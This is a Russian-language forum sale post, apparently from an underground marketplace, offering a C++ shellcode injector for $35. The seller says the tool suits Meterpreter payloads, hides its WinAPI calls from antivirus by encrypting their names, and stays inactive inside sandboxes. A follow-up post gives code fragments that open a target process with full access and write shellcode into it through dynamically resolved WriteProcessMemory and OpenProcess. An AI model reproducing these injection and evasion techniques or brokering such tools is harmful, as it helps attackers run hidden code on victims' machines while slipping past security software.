НЕ ПРОВЕРЕНО Продам инжектор шеллкода

AcidPoisoner

Пользователь

  • 21.05.2022
  • 3
  • 0
  • 1
  • 0 руб.
  • 0 $
AcidPoisoner не предоставил(а) никакой дополнительной информации.
Здравствуйте!

Писал где-то год назад инжектор для своих нужд, но так вышло что он просто пылится на диске и нигде не использовался.
Инжектор написан на C++. Компилировал его на DevC++ (вес exe - 19кб).
Идеально подходит для шеллкодов из meterpreter но так же можно использовать и свои!

Все винапи функции которые он использует зашифрованы в коде и расшифровуются по ходу работы инжектора.
Инжектить код можно в любой процесс (прописывается в исходном коде).
Проверяет не запущен ли он в песочнице, если да то он просто не срабатывает.

35$

Пишите пожалуйста в личку, отвечу на любые вопросы!
 
Автор
Автор
AcidPoisoner

AcidPoisoner

Пользователь

  • 21.05.2022
  • 3
  • 0
  • 1
  • 0 руб.
  • 0 $
AcidPoisoner не предоставил(а) никакой дополнительной информации.
Небольшой кусочек кода -

wpm = (lpfa)GetProcAddress(GetModuleHandle(KDRA), WMPE);
wpm(proc,shell,shellcode,sizeof(shellcode),&total);

Где:
KDRA - это kernel32.dll которая в коде зашифрована и расшифровывается по ходу с помощью отдельной функции.
WMPE - винапи функция WriteProcessMemory которая так же зашифрована.
Прячем WinApi от антивирей особыми способами :)
shellcode - наш шеллкод.

Ещё кусочек кода для чуть большего понимания -

op = (lpfn)GetProcAddress(GetModuleHandle(KDRA), OPEX);
proc = op(PROCESS_ALL_ACCESS,0,ps.th32ProcessID);

OPEX в данной случае - OpenProcess
 
Сверху Снизу